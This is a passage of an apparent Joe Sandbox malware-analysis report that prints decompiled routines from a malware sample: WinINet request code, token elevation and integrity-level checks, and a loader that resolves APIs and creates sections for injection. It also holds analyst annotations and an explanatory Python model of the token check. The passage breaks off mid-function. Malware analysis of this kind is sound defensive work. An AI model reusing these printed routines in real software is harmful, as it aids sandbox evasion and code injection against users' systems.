          				if(_t19 != 0) {
          					InternetSetStatusCallback(_t19, 0);
          					InternetCloseHandle( *(_t45 + 0x10));
          				}
          				_t20 =  *(_t45 + 0x1c);
          				if(_t20 != 0) {
          					CloseHandle(_t20);
          				}
          				_t21 =  *(_t45 + 0x20);
          				if(_t21 != 0) {
          					CloseHandle(_t21);
          				}
          				_t22 =  *((intOrPtr*)(_t45 + 8));
          				if( *((intOrPtr*)(_t45 + 8)) != 0) {
          					E005E61DA(_t22);
          					 *((intOrPtr*)(_t45 + 8)) = 0;
          					 *((intOrPtr*)(_t45 + 0x30)) = 0;
          				}
          				_t23 =  *((intOrPtr*)(_t45 + 0xc));
          				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
          					E005E61DA(_t23);
          				}
          				_t24 =  *_t45;
          				if(_t24 != 0) {
          					_t24 = E005E61DA(_t24);
          				}
          				_t46 =  *((intOrPtr*)(_t45 + 4));
          				if( *((intOrPtr*)(_t45 + 4)) != 0) {
          					return E005E61DA(_t46);
          				}
          				return _t24;
          			}












          0x005e4be7
          0x005e4be7
          0x005e4be9
          0x005e4beb
          0x005e4bf2
          0x005e4bf9
          0x005e4bf9
          0x005e4bfe
          0x005e4c01
          0x005e4c08
          0x005e4c11
          0x005e4c15
          0x005e4c1a
          0x005e4c1a
          0x005e4c1c
          0x005e4c21
          0x005e4c25
          0x005e4c2a
          0x005e4c2a
          0x005e4c2c
          0x005e4c31
          0x005e4c35
          0x005e4c3a
          0x005e4c3a
          0x005e4c3c
          0x005e4c47
          0x005e4c4a
          0x005e4c4a
          0x005e4c4c
          0x005e4c51
          0x005e4c54
          0x005e4c54
          0x005e4c56
          0x005e4c5d
          0x005e4c60
          0x005e4c65
          0x005e4c68
          0x005e4c68
          0x005e4c6b
          0x005e4c70
          0x005e4c73
          0x005e4c73
          0x005e4c78
          0x005e4c7c
          0x005e4c7f
          0x005e4c7f
          0x005e4c84
          0x005e4c89
          0x00000000
          0x005e4c8c
          0x005e4c93

          APIs
          • InternetSetStatusCallback.WININET(?,00000000), ref: 005E4C15
          • InternetCloseHandle.WININET(?), ref: 005E4C1A
          • InternetSetStatusCallback.WININET(?,00000000), ref: 005E4C25
          • InternetCloseHandle.WININET(?), ref: 005E4C2A
          • InternetSetStatusCallback.WININET(?,00000000), ref: 005E4C35
          • InternetCloseHandle.WININET(?), ref: 005E4C3A
          • CloseHandle.KERNEL32(?,00000000,00000102,?,?,005E2248,?,?,747581D0,00000000,00000000), ref: 005E4C4A
          • CloseHandle.KERNEL32(?,00000000,00000102,?,?,005E2248,?,?,747581D0,00000000,00000000), ref: 005E4C54
            • Part of subcall function 005E16B2: WaitForMultipleObjects.KERNEL32(00000002,005E7C47,00000000,005E7C47,?,?,?,005E7C47,0000EA60), ref: 005E16CD
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
          • String ID:
          • API String ID: 2824497044-0
          • Opcode ID: a1f244e896f1548046e1a13531ac598fdabc65f1011b04913e498cdf03e0c9d4
          • Instruction ID: 6a760ba1a49f5ce1ef114c6dbadaefb55d6b586030d57b2f52b050013507cd62
          • Opcode Fuzzy Hash: a1f244e896f1548046e1a13531ac598fdabc65f1011b04913e498cdf03e0c9d4
          • Instruction Fuzzy Hash: 3C112C76600A985BC638AFABDD88C1BBBEDBB543413650D18F0C9D3511C724FC498A64
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 395 5e5e40-5e5e5b 396 5e5efa-5e5f06 395->396 397 5e5e61-5e5e7a OpenProcessToken 395->397 398 5e5e7c-5e5ea7 GetTokenInformation * 2 397->398 399 5e5ef9 397->399 400 5e5eef-5e5ef8 CloseHandle 398->400 401 5e5ea9-5e5eb6 call 5e33dc 398->401 399->396 400->399 404 5e5eee 401->404 405 5e5eb8-5e5ec9 GetTokenInformation 401->405 404->400 406 5e5ecb-5e5ee5 GetSidSubAuthorityCount GetSidSubAuthority 405->406 407 5e5ee8-5e5ee9 call 5e61da 405->407 406->407 407->404
          C-Code - Quality: 100%
          			E005E5E40(long* _a4) {
          				long _v8;
          				void* _v12;
          				void _v16;
          				long _v20;
          				int _t33;
          				void* _t46;
          
          				_v16 = 1;
          				_v20 = 0x2000;
          				if( *0x5ea2fc > 5) {
          					_v16 = 0;
          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
          						_v8 = 0;
          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
          						if(_v8 != 0) {
          							_t46 = E005E33DC(_v8);
          							if(_t46 != 0) {
          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
          								if(_t33 != 0) {
          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
          								}
          								E005E61DA(_t46);
          							}
          						}
          						CloseHandle(_v12);
          					}
          				}
          				 *_a4 = _v20;
          				return _v16;
          			}









          0x005e5e4d
          0x005e5e54
          0x005e5e5b
          0x005e5e6f
          0x005e5e7a
          0x005e5e92
          0x005e5e9f
          0x005e5ea2
          0x005e5ea7
          0x005e5eb2
          0x005e5eb6
          0x005e5ec5
          0x005e5ec9
          0x005e5ee5
          0x005e5ee5
          0x005e5ee9
          0x005e5ee9
          0x005e5eee
          0x005e5ef2
          0x005e5ef8
          0x005e5ef9
          0x005e5f00
          0x005e5f06

          APIs
          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 005E5E72
          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenElevation),00000001,00000004,?,00000000), ref: 005E5E92
          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 005E5EA2
          • CloseHandle.KERNEL32(00000000), ref: 005E5EF2
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 005E5EC5
          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 005E5ECD
          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 005E5EDD
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
          • String ID:
          • API String ID: 1295030180-0
          • Opcode ID: 96ab79af4fdffb97575ee78461af1b32587eae6ca556df2ca61448c7334f5b98
          • Instruction ID: 76606cf997efe539bf68c5e5839de5094933ce32691a639017f3159105f481c7
          • Opcode Fuzzy Hash: 96ab79af4fdffb97575ee78461af1b32587eae6ca556df2ca61448c7334f5b98
          • Instruction Fuzzy Hash: 4B213975900299BFEB04DFA1CC88EAEBF79FB48304F0000A5E950A6161DB719B44EB60
          Uniqueness

          Uniqueness Score: -1.00%
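The E005E5E40 listing is the token probe behind the "evasive API chain checking for process token information" signature: on a build where the global at 0x5ea2fc is above 5 it opens its own token with TOKEN_QUERY | TOKEN_QUERY_SOURCE (0x20008), reads TokenElevation (class 0x14) into the return value, sizes and reads TokenIntegrityLevel (class 0x19), and takes the last sub-authority of the returned SID as the integrity RID, defaulting to 0x2000 (SECURITY_MANDATORY_MEDIUM_RID). The following Python is an added example written for this report, not code from the sample or from Joe Sandbox: it parses a hand-built TOKEN_MANDATORY_LABEL the way the sample does and mirrors the branch results so an analyst can see what the caller receives in each case. Treating the 0x5ea2fc global as the OS major version is an assumption (the report does not name it); the buffers are constructed, and all names are mine.

```python
"""
Added example for the E005E5E40 listing (not code from the sample or from
Joe Sandbox). Models the token probe in pure Python so each branch's return
value can be seen without running the sample. Buffers are constructed by hand
to resemble 32-bit GetTokenInformation output; all names are mine.
"""
import struct
from typing import Optional

# TOKEN_INFORMATION_CLASS values pushed by the sample.
TOKEN_ELEVATION = 0x14        # 20: a DWORD, non-zero when the token is elevated
TOKEN_INTEGRITY_LEVEL = 0x19  # 25: a TOKEN_MANDATORY_LABEL

# SECURITY_MANDATORY_*_RID floors; the sample's default (_v20) is MEDIUM, 0x2000.
MANDATORY_RIDS = [
    (0x0000, "Untrusted"),
    (0x1000, "Low"),
    (0x2000, "Medium"),
    (0x2100, "Medium Plus"),
    (0x3000, "High"),
    (0x4000, "System"),
    (0x5000, "Protected Process"),
]


def parse_sid(blob: bytes, offset: int = 0):
    """Parse a raw SID: Revision(1) SubAuthorityCount(1) IdentifierAuthority(6, big-endian)
    SubAuthority[count] (little-endian DWORDs). Returns (sid_string, sub_authorities)."""
    revision, count = blob[offset], blob[offset + 1]
    if revision != 1 or not 1 <= count <= 15:
        raise ValueError("not a valid SID")
    authority = int.from_bytes(blob[offset + 2:offset + 8], "big")
    subs = list(struct.unpack_from("<%dI" % count, blob, offset + 8))
    return "S-1-%d" % authority + "".join("-%d" % s for s in subs), subs


def last_sub_authority(blob: bytes, offset: int = 0) -> int:
    """GetSidSubAuthority(sid, GetSidSubAuthorityCount(sid) - 1): the integrity RID."""
    return parse_sid(blob, offset)[1][-1]


def build_mandatory_label(rid: int, attributes: int = 0x60) -> bytes:
    """Constructed TOKEN_MANDATORY_LABEL as laid out for a 32-bit process:
    SID_AND_ATTRIBUTES {PSID Sid; DWORD Attributes} followed by the SID itself.
    On Windows Sid is an absolute pointer; here it holds the offset (8) so the
    parser can follow it. 0x60 is SE_GROUP_INTEGRITY | SE_GROUP_INTEGRITY_ENABLED."""
    sid = bytes([1, 1]) + (16).to_bytes(6, "big") + struct.pack("<I", rid)
    return struct.pack("<II", 8, attributes) + sid


def label_for_rid(rid: int) -> str:
    """Name the integrity level whose floor is the highest one not above rid."""
    name = "Untrusted"
    for floor, candidate in MANDATORY_RIDS:
        if rid >= floor:
            name = candidate
    return name


def token_probe(os_major: int, token_opened: bool, elevation: int, label: Optional[bytes]):
    """Mirror of E005E5E40's (return value, *_a4) pair. os_major stands for the global
    at 0x5ea2fc; reading it as the OS major version (so '> 5' means Vista or later) is
    an assumption. elevation is the DWORD GetTokenInformation(TokenElevation) writes,
    0 if that call failed, and label is None when either TokenIntegrityLevel query failed."""
    elevated, rid = 1, 0x2000          # pre-Vista defaults: _v16 = 1, _v20 = 0x2000
    if os_major > 5:
        elevated = 0                   # _v16 = 0 before the token is queried
        if token_opened:
            elevated = elevation
            if label is not None:
                psid = struct.unpack_from("<I", label, 0)[0]   # *_t46
                rid = last_sub_authority(label, psid)
    return elevated, rid


if __name__ == "__main__":
    buf = build_mandatory_label(0x3000)
    print(parse_sid(buf, 8)[0])
    flag, rid = token_probe(10, True, 1, buf)
    print(f"elevated={flag} integrity=0x{rid:x} ({label_for_rid(rid)})")
```

Note that the sample never checks the result of the TokenElevation query, so a failed call leaves the flag at 0 on Vista and later; and because the 0x2000 default survives every failure path after the version check, a caller that only looks at the RID cannot distinguish "medium integrity" from "token query failed", which is worth remembering when deciding how the sample behaves in a restricted sandbox.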

          Control-flow Graph

          C-Code - Quality: 64%
          			E005E6675(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
          				intOrPtr _v8;
          				intOrPtr _t9;
          				intOrPtr _t13;
          				char* _t19;
          				char* _t28;
          				void* _t33;
          				void* _t34;
          				char* _t36;
          				void* _t38;
          				intOrPtr* _t39;
          				char* _t40;
          				char* _t42;
          				char* _t43;
          
          				_t34 = __edx;
          				_push(__ecx);
          				_t9 =  *0x5ea348; // 0x25dd5a8
          				_t1 = _t9 + 0x5eb516; // 0x253d7325
          				_t36 = 0;
          				_t28 = E005E5815(__ecx, _t1);
          				if(_t28 != 0) {
          					_t39 = __imp__;
          					_t13 =  *_t39(_t28, _t38);
          					_v8 = _t13;
          					_t6 =  *_t39(_a4) + 1; // 0x2bc9601
          					_t40 = E005E33DC(_v8 + _t6);
          					if(_t40 != 0) {
          						strcpy(_t40, _t28);
          						_pop(_t33);
          						__imp__(_t40, _a4);
          						_t19 = E005E5063(_t33, _t34, _t40, _a8); // executed
          						_t36 = _t19;
          						E005E61DA(_t40);
          						_t42 = E005E4AC7(StrTrimA(_t36, "="), _t36);
          						if(_t42 != 0) {
          							E005E61DA(_t36);
          							_t36 = _t42;
          						}
          						_t43 = E005E2708(_t36, _t33);
          						if(_t43 != 0) {
          							E005E61DA(_t36);
          							_t36 = _t43;
          						}
          					}
          					E005E61DA(_t28);
          				}
          				return _t36;
          			}
















          0x005e6675
          0x005e6678
          0x005e6679
          0x005e6680
          0x005e6687
          0x005e668e
          0x005e6692
          0x005e6699
          0x005e66a0
          0x005e66a5
          0x005e66ad
          0x005e66b7
          0x005e66bb
          0x005e66bf
          0x005e66c5
          0x005e66ca
          0x005e66d4
          0x005e66da
          0x005e66dc
          0x005e66f3
          0x005e66f7
          0x005e66fa
          0x005e66ff
          0x005e66ff
          0x005e6708
          0x005e670c
          0x005e670f
          0x005e6714
          0x005e6714
          0x005e670c
          0x005e6717
          0x005e671c
          0x005e6722

          APIs
            • Part of subcall function 005E5815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,005E668E,253D7325,00000000,00000000,?,775EC740,005E3ECE), ref: 005E587C
            • Part of subcall function 005E5815: sprintf.NTDLL ref: 005E589D
          • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66A0
          • lstrlen.KERNEL32(00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66A8
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • strcpy.NTDLL ref: 005E66BF
          • lstrcat.KERNEL32(00000000,00000000), ref: 005E66CA
            • Part of subcall function 005E5063: lstrlen.KERNEL32(00000000,00000000,005E3ECE,00000000,?,005E66D9,00000000,005E3ECE,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E5074
            • Part of subcall function 005E61DA: RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,005E3ECE,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66E7
            • Part of subcall function 005E4AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,005E66F3,00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E4AD1
            • Part of subcall function 005E4AC7: _snprintf.NTDLL ref: 005E4B2F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
          • String ID: =
          • API String ID: 2864389247-1428090586
          • Opcode ID: 8e2c4319568cc5cf27479d545436b38e5201e3f6493cd26c8a995f949a2427ab
          • Instruction ID: c9bce19c844b8315d34dff51dc3cbd97c17409e87b4c1244d2b771fbd010f643
          • Opcode Fuzzy Hash: 8e2c4319568cc5cf27479d545436b38e5201e3f6493cd26c8a995f949a2427ab
          • Instruction Fuzzy Hash: D411E7739006A667461EBB768CC9C6F3FADBE987E43040016F980AB102DE74DD0597A1
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 435 401202-401214 call 4012e6 438 4012d5 435->438 439 40121a-40124f GetModuleHandleA GetProcAddress 435->439 442 4012dc-4012e3 438->442 440 401251-401265 GetProcAddress 439->440 441 4012cd-4012d3 call 401ba9 439->441 440->441 443 401267-40127b GetProcAddress 440->443 441->442 443->441 445 40127d-401291 GetProcAddress 443->445 445->441 447 401293-4012a7 GetProcAddress 445->447 447->441 448 4012a9-4012ba call 40110b 447->448 450 4012bf-4012c4 448->450 450->441 451 4012c6-4012cb 450->451 451->442
          C-Code - Quality: 100%
          			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
          				intOrPtr _v8;
          				_Unknown_base(*)()* _t29;
          				_Unknown_base(*)()* _t33;
          				_Unknown_base(*)()* _t36;
          				_Unknown_base(*)()* _t39;
          				_Unknown_base(*)()* _t42;
          				intOrPtr _t46;
          				struct HINSTANCE__* _t50;
          				intOrPtr _t56;
          
          				_t56 = E004012E6(0x20);
          				if(_t56 == 0) {
          					_v8 = 8;
          				} else {
          					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
          					_v8 = 0x7f;
          					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
          					 *(_t56 + 0xc) = _t29;
          					if(_t29 == 0) {
          						L8:
          						E00401BA9(_t56);
          					} else {
          						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
          						 *(_t56 + 0x10) = _t33;
          						if(_t33 == 0) {
          							goto L8;
          						} else {
          							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
          							 *(_t56 + 0x14) = _t36;
          							if(_t36 == 0) {
          								goto L8;
          							} else {
          								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
          								 *(_t56 + 0x18) = _t39;
          								if(_t39 == 0) {
          									goto L8;
          								} else {
          									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
          									 *(_t56 + 0x1c) = _t42;
          									if(_t42 == 0) {
          										goto L8;
          									} else {
          										 *((intOrPtr*)(_t56 + 8)) = _a8;
          										 *((intOrPtr*)(_t56 + 4)) = _a4;
          										_t46 = E0040110B(_t56, _a12); // executed
          										_v8 = _t46;
          										if(_t46 != 0) {
          											goto L8;
          										} else {
          											 *_a16 = _t56;
          										}
          									}
          								}
          							}
          						}
          					}
          				}
          				return _v8;
          			}












          0x00401210
          0x00401214
          0x004012d5
          0x0040121a
          0x00401232
          0x00401241
          0x00401248
          0x0040124a
          0x0040124f
          0x004012cd
          0x004012ce
          0x00401251
          0x0040125e
          0x00401260
          0x00401265
          0x00000000
          0x00401267
          0x00401274
          0x00401276
          0x0040127b
          0x00000000
          0x0040127d
          0x0040128a
          0x0040128c
          0x00401291
          0x00000000
          0x00401293
          0x004012a0
          0x004012a2
          0x004012a7
          0x00000000
          0x004012a9
          0x004012af
          0x004012b5
          0x004012ba
          0x004012bf
          0x004012c4
          0x00000000
          0x004012c6
          0x004012c9
          0x004012c9
          0x004012c4
          0x004012a7
          0x00401291
          0x0040127b
          0x00401265
          0x0040124f
          0x004012e3

          APIs
            • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
          • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
          • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
          • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
          • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
          • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
          • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
            • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401168
            • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
          • String ID:
          • API String ID: 3012371009-0
          • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
          • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
          • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
          • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E005E51D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
          				// __eax: request context; +0x18 holds the WinINet request handle,
          				// +0x1c and +0x20 hold two event handles that signal completion
          				void* __esi;
          				long _t10;
          				void* _t18;
          				void* _t22;
          
          				_t9 = __eax;
          				_t22 = __eax;
          				// _a4: optional request data, copied into the context by E005E2058
          				// (lstrlen / memcpy / lstrcpy in the subcall list below)
          				if(_a4 != 0 && E005E2058(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
          					L9:
          					return GetLastError();
          				}
          				_t10 = E005E7B83(_t9, _t18, _t22, _a8); // executed
          				if(_t10 == 0) {
          					ResetEvent( *(_t22 + 0x1c));
          					ResetEvent( *(_t22 + 0x20));
          					// no additional headers (lpszHeaders = NULL, dwHeadersLength = -1L) and no optional body
          					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
          						SetEvent( *(_t22 + 0x1c));
          						goto L7;
          					} else {
          						_t10 = GetLastError();
          						// 0x3e5 = ERROR_IO_PENDING: the handle was opened asynchronously, the send is
          						// still in flight and is treated as success
          						if(_t10 == 0x3e5) {
          							L7:
          							_t10 = 0;
          						}
          					}
          				}
          				// a -1 result from E005E7B83 means "report GetLastError instead"
          				if(_t10 == 0xffffffff) {
          					goto L9;
          				}
          				return _t10;
          			}
          
          Instruction addresses for this listing (address column, extracted as a bare list): 0x005e51d8 .. 0x005e524e; entries of 0x00000000 are lines without a resolved address.

          APIs
          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,005E21E7,?,?,747581D0,00000000), ref: 005E5212
          • ResetEvent.KERNEL32(?), ref: 005E5217
          • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 005E5224
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,005E3F34,00000000,?,?), ref: 005E522F
          • GetLastError.KERNEL32(?,?,00000102,005E21E7,?,?,747581D0,00000000), ref: 005E524A
            • Part of subcall function 005E2058: lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,005E51F7,?,?,?,?,00000102,005E21E7,?,?,747581D0), ref: 005E2064
            • Part of subcall function 005E2058: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,005E51F7,?,?,?,?,00000102,005E21E7,?), ref: 005E20C2
            • Part of subcall function 005E2058: lstrcpy.KERNEL32(00000000,00000000), ref: 005E20D2
          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,005E3F34,00000000,?), ref: 005E523D
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
          • String ID:
          • API String ID: 3739416942-0
          • Opcode ID: 84242a4c122968e350fa86b86d1eafa65a3315146c692983a0b974a3fbd781e3
          • Instruction ID: f00249f4dac721dd37ec707f869359d7f201055e9f27fd37d6c14533a44263c1
          • Opcode Fuzzy Hash: 84242a4c122968e350fa86b86d1eafa65a3315146c692983a0b974a3fbd781e3
          • Instruction Fuzzy Hash: 8B016235100691AAD7396B72DC48F5B7FA9BF58368F100A25F6D1D10E0E720E804E621
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 50%
          			E005E5364(void** __esi) {
          				// __esi: two-slot object; [0] = current buffer, [1] receives the result of E005E12C6.
          				// The two unresolved __imp__ calls are RtlEnterCriticalSection / RtlLeaveCriticalSection
          				// (see the APIs list below) on the lock at +0x40 of the global context at 0x5ea3cc.
          				intOrPtr _v0;
          				intOrPtr _t4;
          				intOrPtr _t6;
          				void* _t8;
          				void* _t9;
          				intOrPtr _t10;
          				void* _t11;
          				void** _t13;
          
          				_t13 = __esi;
          				_t4 =  *0x5ea3cc; // 0x2bc9600  global context (0x60 bytes, allocated in E005E2523)
          				__imp__(_t4 + 0x40); // RtlEnterCriticalSection
          				while(1) {
          					_t6 =  *0x5ea3cc; // 0x2bc9600
          					_t1 = _t6 + 0x58; // 0x0
          					if( *_t1 == 0) { // spin while the dword at +0x58 is non-zero
          						break;
          					}
          					Sleep(0xa); // 10 ms per iteration
          				}
          				_t8 =  *_t13;
          				// release the previous buffer unless it is the static default at 0x5ea030
          				if(_t8 != 0 && _t8 != 0x5ea030) {
          					HeapFree( *0x5ea2d8, 0, _t8); // 0x5ea2d8 = heap handle used throughout the module
          				}
          				_t9 = E005E12C6(_v0, _t13); // executed
          				_t13[1] = _t9;
          				_t10 =  *0x5ea3cc; // 0x2bc9600
          				_t11 = _t10 + 0x40;
          				__imp__(_t11); // RtlLeaveCriticalSection
          				return _t11;
          			}
          
          Instruction addresses for this listing (address column, extracted as a bare list): 0x005e5364 .. 0x005e53c1; entries of 0x00000000 are lines without a resolved address.

          APIs
          • RtlEnterCriticalSection.NTDLL(02BC95C0), ref: 005E536D
          • Sleep.KERNEL32(0000000A), ref: 005E5377
          • HeapFree.KERNEL32(00000000,00000000), ref: 005E539F
          • RtlLeaveCriticalSection.NTDLL(02BC95C0), ref: 005E53BB
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
          • String ID: Uqt
          • API String ID: 58946197-2320327147
          • Opcode ID: 771ab01aa9ce801a35d8f48db5d6636f7cc8db0099d5742d901bd6d5899f4981
          • Instruction ID: 75b02d4a2fd7cda202f85ea6429cfce01829a1c9c0b2d325b3eed49daef9ffe8
          • Opcode Fuzzy Hash: 771ab01aa9ce801a35d8f48db5d6636f7cc8db0099d5742d901bd6d5899f4981
          • Instruction Fuzzy Hash: 2CF0DA716006C19BEB2C9F76DC8CB567FE4AB68384B144814B5C1DA271D670E858EB26
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 59%
          			E005E2523(signed int __edx) {
          				// Module initialisation: records the OS version, creates the 0x60-byte global
          				// context at 0x5ea3cc, builds the User-Agent string and starts the main work.
          				// Numeric constants below are annotated with the Win32 error codes and the
          				// ASCII decoding of the dword values the decompiler shows.
          				signed int _v8;
          				long _v12;
          				CHAR* _v16;
          				long _v20;
          				void* __ebx;
          				void* __edi;
          				void* __esi;
          				void* _t21;
          				CHAR* _t22;
          				CHAR* _t25;
          				intOrPtr _t26;
          				void* _t27;
          				void* _t31;
          				intOrPtr _t32;
          				void* _t33;
          				CHAR* _t37;
          				CHAR* _t43;
          				CHAR* _t44;
          				CHAR* _t45;
          				void* _t50;
          				void* _t52;
          				signed char _t57;
          				intOrPtr _t59;
          				signed int _t60;
          				void* _t64;
